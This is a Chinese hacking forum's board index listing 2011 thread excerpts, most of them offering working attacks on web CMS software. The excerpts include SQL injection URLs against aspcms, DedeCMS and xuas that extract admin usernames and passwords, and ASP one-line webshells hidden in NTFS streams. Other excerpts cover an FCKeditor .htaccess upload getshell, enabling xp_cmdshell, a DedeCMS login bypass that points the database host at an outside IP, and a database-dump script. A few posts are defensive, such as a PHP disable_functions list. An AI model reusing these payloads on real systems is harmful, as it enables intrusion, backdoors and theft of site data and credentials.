收藏本版 |订阅

电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

  • ECSHOP php商城系统过滤不严导致SQL注入漏洞
    影响版本: ECSHOP 2.7.2 Release 0604 程序介绍: ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 在include_libcommon.php中存在如下函数 PHP Code复制内容到剪贴板 function g ...
    064 遗落的世界 发表于 2011-10-10 服务器安全
  • 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版
    我就随便改进了下,希望用的到的朋友可以收藏。 第二版改进: 1.检测2条漏洞 2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。 其他也没什么了。 本文转载自『半坑土农民's Blog』科讯kesion 6.x – 7.06 SQL VBS Exp 第二版 ...
    098 深尚线 发表于 2011-9-30 服务器安全
  • php disable_functions 函数列表
    禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 复制代码代码如下: disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_fi ...
    084 惜凝 发表于 2011-9-29 服务器安全
  • 利用ntfs流隐藏你的一句话木马的方法
    这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!如下是ASP脚本的例子!NTFS流文件的内容如下<%re= request("test")if re <>"" then  execute re  response.end '表示结束,不再处理别的代码end if%>把内容写入如下位置(示例位置)H:\Web\动易\Inc:1.jpg 看清楚,是&n ...
    056 石滔源 发表于 2011-9-29 服务器安全
  • php后台插一句话后门的思路分享
    首先介绍下php的各种标签: 1): <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): <? echo "test"; ?> 这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它, 大多程序员都是很熟悉的!我们把这种标签称为短语标签! 3): <script ...
    060 理性点 发表于 2011-9-29 服务器安全
  • FCKeditor上传Getshell不要忘记htaccess
    1.创建一个.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.上传shell www.badguest.cn FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html 这是上传地址,然后将你的webshell文件改后缀shell.php ...
    081 从今天开始 发表于 2011-9-29 入侵防御
  • MSSQL2008一句话启用xp_cmdshell
    SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。     幸运的是:只要该扩展存 ...
    054 静静水 发表于 2011-9-29 入侵防御
  • dedecms官方模板包含一句话后门木马
    现在的黑客多胆大包天啊,在天朝居然敢干这种明目张胆的事情。 应该是前几天出的那个dedecms的0day.官方的网站被日,然后被在风格模板里面值入 了一句话木马。XXOO。这年头啥多靠不住。”官方”也一样!你懂得的? 另外一个目录也有。 有在织梦官方下过模板的同学快看看吧。 BY:TOOLS论坛。 ...
    088 刘玉前 发表于 2011-9-29 服务器安全
  • MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)
    复制代码代码如下: <html> <head> <title>:: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : <?=$_SERVER["PHP_SELF"]?></title> <style type="text/css"> .font{ size : 2px; } </style> </head> <body> <h4>Mysql Database on Tables to Txt...</h4> #_E-mail:go_root#Hotmail.com #_Author:HYrz --------------------------- ...
    070 弱水叁仟 发表于 2011-9-28 服务器安全
  • aspcms企业建站系统0day漏洞介绍
    漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+wh ...
    083 日明月 发表于 2011-9-26 服务器安全
  • IPC$ 扫描和IPC$漏洞的防范小结
    IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道!而 IPC$ 并不算是一个漏洞,但因一般电脑用户设置系统的密码为空,这就成为一个可给利用的漏洞了!别人用管理员权限的帐号和空密码登陆你的系统后,别人就可以开共享 ...
    069 沈瑞庚 发表于 2011-9-26 服务器安全
  • 常用的一些注入命令 方便一下大家
    我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And c ...
    031 致用 发表于 2011-9-26 服务器安全
  • DEDECMS 爆严重安全漏洞 免账号密码直接进入后台
    入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root 把上面validate后面的字母改为当前的验证码,即可直接进入网 ...
    043 陈丁青 发表于 2011-8-20 服务器安全
  • 分享几个WebSite网站防黑经验
    1 .设置严密权限 上传目录只给写入、读取权限绝对不能给执行权限 每个网站WebSite使用独立用户名和密码权限设置为Guest 命令: net localgroup users myweb /del 设置MSSQL、Apache、MySQL以Guest权限运行:在运行中打:service.msc选择相应服务以个Guest权限账户运行 2.防止SQL注入 以前用通用防注入模块后来在多次和黑客血和 ...
    071 李秋江 发表于 2011-8-19 其他
  • DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
    DedeCmsV5.6 本地包含 DedeCmsV5.6 本地包含 http://t00ls.net/thread-8608-1-1.html 之前就发现了这本地包含的利用方法。 复制代码代码如下:<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-dat ...
    075 彭亮亮 发表于 2011-8-19 服务器安全
  • DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
    DEDECMS 5.6最新Get Shell漏洞 影响版本:  DEDECMS 5.3/5.6   漏洞描述:   DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站 ...
    083 高术明 发表于 2011-8-19 服务器安全
  • dedecms v5.6 GBK 注入漏洞利用(member/index.php)
    EXP: htp://127.0.0.1/member/index.php?uid=&#039;%20||%20&#039;&#039;%20||%20&#039;%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7&#039;; 会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS EXP: htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7' ...
    050 东洋大海 发表于 2011-8-19 服务器安全
  • DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
    漏洞描述: 健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 plus/adva ...
    070 三缄室主人 发表于 2011-8-19 服务器安全
  • 讯时漏洞一小结
    以下本文总结来自黑防去年第9期杂志上的内容... 先说一个注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b% 26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 这里一个注入 效果如图: 这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现 ...
    028 船工 发表于 2011-7-15 服务器安全
  • 讯时系统(xuas)最新通杀漏洞0day图文说明
    google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧) 1、/admin/admin_news_pl_view.asp?id=1//id任意 填入以下语句 2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷! 3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 爆出管理员帐号和密 ...
    044 用户夜猫子 发表于 2011-7-15 服务器安全
  • 下一页 »

    快速发帖

    还可输入 180 个字符
    您需要登录后才可以发帖 登录 | 立即注册

    本版积分规则

    相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

    Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

    在本版发帖返回顶部